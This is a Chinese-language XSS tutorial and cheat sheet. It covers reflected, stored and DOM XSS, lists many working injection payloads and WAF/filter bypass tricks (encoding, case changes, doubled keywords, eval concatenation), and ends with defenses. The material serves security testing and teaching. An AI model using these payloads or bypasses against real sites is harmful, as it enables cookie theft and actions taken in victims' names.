XSS总结

1. 简述

XSS攻击通常指的是通过利用网页开发时留下的漏洞，通过巧妙的方法注入恶意指令代码到网页，使用户加载并执行攻击者恶意制造的网页程序。这些恶意网页程序通常是JavaScript，但实际上也可以包括Java，VBScript，ActiveX，Flash或者甚至是普通的HTML。攻击成功后，攻击者可能得到更高的权限（如执行一些操作）、私密网页内容、会话和cookie等各种内容。

2. 常用的XSS攻击手段和目的

盗用cookie，获取敏感信息。-+
利用植入Flash，通过crossdomain权限设置进一步获取更高权限；或者利用Java等得到类似的操作。
利用iframe、frame、XMLHttpRequest或上述Flash等方式，以（被攻击）用户的身份执行一些管理动作，或执行一些一般的操作如发微博、加好友、发私信等操作。
利用可被攻击的域受到其他域信任的特点，以受信任来源的身份请求一些平时不允许的操作，如进行不当的投票活动。
在访问量极大的一些页面上的XSS可以攻击一些小型网站，实现DDOS攻击的效果。

3. 分类

3.1 反射型

反射型跨站脚本（Reflected Cross-Site Scripting）是最常见，也是使用最广的一种，可将恶意脚本附加到 URL 地址的参数中。
反射型 XSS 的利用一般是攻击者通过特定手法（如电子邮件），诱使用户去访问一个包含恶意代码的 URL，当受害者点击这些专门设计的链接的时候，恶意代码会直接在受害者主机上的浏览器执行。此类 XSS 通常出现在网站的搜索栏、用户登录口等地方，常用来窃取客户端 Cookies 或进行钓鱼欺骗。

3.2 存储型

持久型跨站脚本（Persistent Cross-Site Scripting）也等同于存储型跨站脚本（Stored Cross-Site Scripting）。
此类 XSS 不需要用户单击特定 URL 就能执行跨站脚本，攻击者事先将恶意代码上传或储存到漏洞服务器中，只要受害者浏览包含此恶意代码的页面就会执行恶意代码。持久型 XSS 一般出现在网站留言、评论、博客日志等交互处，恶意脚本存储到客户端或者服务端的数据库中。

3.3 DOM型

DOM型xss属于反射型xss的一种，只是不通过服务器，DOM跨站是纯页面脚本的输出，只有规范使用JAVASCRIPT，才可以防御。

传统的 XSS 漏洞一般出现在服务器端代码中，而 DOM-Based XSS 是基于 DOM 文档对象模型的一种漏洞，所以，受客户端浏览器的脚本代码所影响。客户端 JavaScript 可以访问浏览器的 DOM 文本对象模型，因此能够决定用于加载当前页面的 URL。换句话说，客户端的脚本程序可以通过 DOM 动态地检查和修改页面内容，它不依赖于服务器端的数据，而从客户端获得 DOM 中的数据（如从 URL 中提取数据）并在本地执行。另一方面，浏览器用户可以操纵 DOM 中的一些对象，例如 URL、location 等。用户在客户端输入的数据如果包含了恶意 JavaScript 脚本，而这些脚本没有经过适当的过滤和消毒，那么应用程序就可能受到基于 DOM 的 XSS 攻击。

4. XSS执行原理

造成xss代码执行的根本原因就在数据渲染到页面过程中，html解析触发执行了xss脚本。

脚本的注入分两类：

1、直接注入script脚本。

2、通过某些标签的属性和事件。比如：<img src="aaa.png" onerror="javascript:alert('xss');">、<a href="javascript:alert('xss');">xss</a>等

直接注入script脚本：我们可能经常使用jquery,通过html()方法去操作页面。这个时候就会触发xss,因为jquery的html()方法设计初衷就是让js脚本执行。原因是：jquery解析到script就会通过createElement('script')创建一个script节点，而此时浏览器就会去执行这个script; 同样的原生js的api,innerHTML也会把含有script脚本的字符串当成标签解析到浏览器，只不过因为浏览器加载js的原则：只会在页面加载时执行一次。所以通过innerHTML无法触发xss。 text()、innerText等方法都是把含xss字符串当作文本节点，所以无法被解析成html节点，也就不会触发xss。

通过属性和事件：<img src="aaa.png" onerror="javascript:alert('xss')">。因为img标签未闭合所以会触发 onerror事件，导致xss脚本执行。

5. 无任何过滤情况下

一些常见标签

PS：下面我列举的标签大部分是可以自动触发js代码的，无需用户去交互，大部分情况下我们也是希望是自动触发而不是等用户去触发，还有我测试的浏览器是火狐，Chrome，IE11.0，其它的浏览器没有去测试，有兴趣的师傅可以测试一下。

<scirpt>

1	<scirpt>alert("xss");</script>

<img>

1	<img src=1 onerror=alert("xss");>

<input>

<input onfocus="alert('xss');">
竞争焦点，从而触发onblur事件
<input onblur=alert("xss") autofocus><input autofocus>
通过autofocus属性执行本身的focus事件，这个向量是使焦点自动跳到输入元素上,触发焦点事件，无需用户去触发
<input onfocus="alert('xss');" autofocus>

<details>

1
2
3

<details ontoggle="alert('xss');">
使用open属性触发ontoggle事件，无需用户去触发
<details open ontoggle="alert('xss');">

<svg>

1	<svg onload=alert("xss");>

<select>

1
2
3

<select onfocus=alert(1)></select>
通过autofocus属性执行本身的focus事件，这个向量是使焦点自动跳到输入元素上,触发焦点事件，无需用户去触发
<select onfocus=alert(1) autofocus>

<iframe>

1	<iframe onload=alert("xss");></iframe>

<frame>

<frame src="javascript:alert(1)">

<frame src="javascript:%20%0aalert%20%0d %09(1)">

<iframe srcdoc="<img src&equals;x:x onerror&equals;alert&lpar;1&rpar;>" />
2134'></textarea><script>alert(/xss/)</script><textarea>

<video>

1	<video><source onerror="alert(1)">

<audio>

1	<audio src=x onerror=alert("xss");>

<body>

1	<body/onload=alert("xss");>

利用换行符以及autofocus，自动去触发onscroll事件，无需用户去触发

1
2

<body
onscroll=alert("xss");><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><input autofocus>

<textarea>

1	<textarea onfocus=alert("xss"); autofocus>

<keygen>

1	<keygen autofocus onfocus=alert(1)> //仅限火狐

<marquee>

1	<marquee onstart=alert("xss")></marquee> //Chrome不行，火狐和IE都可以

<isindex>

1	<isindex type=image src=1 onerror=alert("xss")>//仅限于IE

chrome

1	<img src ?itworksonchrome?\/onerror = alert(1)>

data形式

1
2
3

<object data=data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg></object>
<embed src=data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg></embed>
<script src=data:%26comma;alert(1)></script>

ontoggle

1	<details open ontoggle="alert('已是黄昏独自愁，一枝红杏出墙来')">

url加密绕圆括号

1
2
3

<svg/onload=alert(1)>
<svg onload='JavascRipT:alert%281%29'>
<svg/onload ="location='jav'+'ascript'+':%2'+'0aler'+'t%20%2'+'81%'+'29'">

利用link远程包含js文件

PS：在无CSP的情况下才可以

1	<link rel=import href="http://127.0.0.1/1.js">

javascript伪协议

<a>标签

1	<a href="javascript:alert(`xss`);">xss</a>

<iframe>标签

1	<iframe src=javascript:alert('xss');></iframe>

<img>标签

1	<img src=javascript:alert('xss')>//IE7以下

<form>标签

1	<form action="javascript:alert(1)"><input type=submit>

1
2
3

如果（）不能用 可以用  反引号

如果 空格被过滤可以使用 %0a 或 %0d 或/**/

其它

expression属性

1
2
3

<img style="xss:expression(alert('xss''))"> // IE7以下
<div style="color:rgb(''�x:expression(alert(1))"></div> //IE7以下
<style>#test{x:expression(alert(/XSS/))}</style> // IE7以下

background属性

1	<table background=javascript:alert(1)></table> //在Opera 10.5和IE6上有效

6. 有过滤的情况下

长度绕过

<svg/onload=alert()>，这个长度为20个字符。
<script/src=//⑭.₨>，只有18个字符。其中₨代表印度卢比，这是1个字符，而不是2个字符，而⑭也是类似的效果。

过滤函数

alert()过滤

1
2
3

<script>alert('xss')</script> 
<script>confirm('xss')</script> 
<script>prompt('xss')</script>

<script>过滤

<a href="onclick=alert('xss')"> click</a>123">

<a/href=//www.baidu.com/>XssTest</a>

<img src=# onerror=alert('xss')></img>

<iframe onload=alert('xss')>

过滤空格

用/代替空格

1	<img/src="x"/onerror=alert("xss");>

过滤关键字

大小写绕过

1	<ImG sRc=x onerRor=alert("xss");>

双写关键字

有些waf可能会只替换一次且是替换为空，这种情况下我们可以考虑双写关键字绕过

1	<imimgg srsrcc=x onerror=alert("xss");>

字符拼接

利用eval

1	<img src="x" onerror="a=`aler`;b=`t`;c='(`xss`);';eval(a+b+c)">

利用top

1	<script>top["al"+"ert"](`xss`);</script>

其它字符混淆

有的waf可能是用正则表达式去检测是否有xss攻击，如果我们能fuzz出正则的规则，则我们就可以使用其它字符去混淆我们注入的代码了
下面举几个简单的例子

可利用注释、标签的优先级等
1.<<script>alert("xss");//<</script>
2.<title><img src=</title>><img src=x onerror="alert(`xss`);"> //因为title标签的优先级比img的高，所以会先闭合title，从而导致前面的img标签无效
3.<SCRIPT>var a="\\";alert("xss");//";</SCRIPT>

编码绕过

Unicode编码绕过

1
2
3

<img src="x" onerror="&#97;&#108;&#101;&#114;&#116;&#40;&#34;&#120;&#115;&#115;&#34;&#41;&#59;">

<img src="x" onerror="eval('\u0061\u006c\u0065\u0072\u0074\u0028\u0022\u0078\u0073\u0073\u0022\u0029\u003b')">

url编码绕过

1
2
3

<img src="x" onerror="eval(unescape('%61%6c%65%72%74%28%22%78%73%73%22%29%3b'))">

<iframe src="data:text/html,%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%31%29%3C%2F%73%63%72%69%70%74%3E"></iframe>

Ascii码绕过

1	<img src="x" onerror="eval(String.fromCharCode(97,108,101,114,116,40,34,120,115,115,34,41,59))">

hex绕过

1	<img src=x onerror=eval('\x61\x6c\x65\x72\x74\x28\x27\x78\x73\x73\x27\x29')>

八进制

1	<img src=x onerror=alert('\170\163\163')>

base64绕过

1
2
3

<img src="x" onerror="eval(atob('ZG9jdW1lbnQubG9jYXRpb249J2h0dHA6Ly93d3cuYmFpZHUuY29tJw=='))">

<iframe src="data:text/html;base64,PHNjcmlwdD5hbGVydCgneHNzJyk8L3NjcmlwdD4=">

过滤双引号，单引号

1.如果是html标签中，我们可以不用引号。如果是在js中，我们可以用反引号代替单双引号

1	<img src="x" onerror=alert(`xss`);>

过滤双引号：在alert中实体转换alert("XSS")

使用JavaScript的fromCharCode函数绕过过滤:

1	<IMGSRC=javascript:alert(String.fromCharCode(88,83,83))>

2.使用编码绕过，具体看上面我列举的例子，我就不多赘述了

过滤括号

当括号被过滤的时候可以使用throw来绕过

1	<svg/onload="window.onerror=eval;throw'=alert\x281\x29';">

过滤url地址

使用url编码

1	<img src="x" onerror=document.location=`http://%77%77%77%2e%62%61%69%64%75%2e%63%6f%6d/`>

使用IP

1.十进制IP

1	<img src="x" onerror=document.location=`http://2130706433/`>

2.八进制IP

1	<img src="x" onerror=document.location=`http://0177.0.0.01/`>

3.hex

1	<img src="x" onerror=document.location=`http://0x7f.0x0.0x0.0x1/`>

4.html标签中用//可以代替http://

1	<img src="x" onerror=document.location=`//www.baidu.com`>

5.使用\\

1	但是要注意在windows下\本身就有特殊用途，是一个path 的写法，所以\\在Windows下是file协议，在linux下才会是当前域的协议

Windows下

Linux下

6.使用中文逗号代替英文逗号
如果你在你在域名中输入中文句号浏览器会自动转化成英文的逗号

1	<img src="x" onerror="document.location=`http://www.baidu.com`">//会自动跳转到百度

过滤时间

setTimeout

1	<svg/onload=setTimeout('ale'+'rt(1)',0)>

7. XSS变种

XSS变种的类型在于JavaScript能执行的位置有多少。

confirm() 方法用于显示一个带有指定消息和 OK 及取消按钮的对话框。
1
"/><ScRiPt>confirm(9174)</ScRiPt>

跳转链接

1 2	<a/href=//www.baidu.com/>XssTest</a> <a href="javascript:alert(1)">x</a>

img类型的xss

1 2	<img src='#' onerror='alert("XSS")' > <img src='' onerror=alert(/poc/)>

对于过滤<>
1
%27;alert%28/aa/%29;a=%27

邮箱系统，存储型

1	<STYLE>@im\port'\ja\vasc\ript:alert("XSS")';</STYLE>

inframe框架执行JS

1	<iframe src="javascript:alert(1)"></iframe>

8. 如何防止XSS

过滤一些危险字符，以及转义& < > " ' /等危险字符
过滤标签
HTTP-only Cookie: 禁止 JavaScript 读取某些敏感 Cookie，攻击者完成 XSS 注入后也无法窃取此Cookie。
设置CSP(Content Security Policy)
输入内容长度限制
对用户的输入内容做限制,可以用正则对出入格式进行匹配
对数据进行在编码处理

9. 参考

https://cloud.tencent.com/developer/article/1373688

https://www.freebuf.com/news/topnews/220970.html